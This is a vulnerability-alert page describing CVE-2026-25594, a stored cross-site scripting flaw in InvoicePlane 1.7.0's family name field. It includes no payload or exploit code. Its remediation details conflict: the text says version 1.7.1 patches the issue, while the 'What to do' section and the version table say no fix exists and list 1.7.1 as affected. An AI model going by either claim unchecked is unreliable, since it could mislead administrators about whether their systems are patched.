Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
4.8
InvoicePlane 1.7.0: Malicious Names Can Harm Admins
CVE-2026-25594
Summary
A security issue in InvoicePlane 1.7.0 lets attackers inject malicious code into the application, which can affect administrators. This can happen when an administrator creates a new family with a specially crafted name. To fix this, update to InvoicePlane 1.7.1 or later.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| invoiceplane | invoiceplane | <= 1.7.1 | – |
Original title
InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A Stored Cross-Site Scripting (XSS) vulnerability exists in InvoicePlane 1.7.0 via the Family Nam...
Original description
InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A Stored Cross-Site Scripting (XSS) vulnerability exists in InvoicePlane 1.7.0 via the Family Name field. The `family_name` value is rendered without HTML encoding inside the family dropdown on the product form. When an administrator creates a family with a malicious name, the payload executes in the browser of any administrator who visits the product form. Version 1.7.1 patches the issue.
nvd CVSS3.1
4.8
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
Published: 18 Feb 2026 · Updated: 11 Mar 2026 · First seen: 6 Mar 2026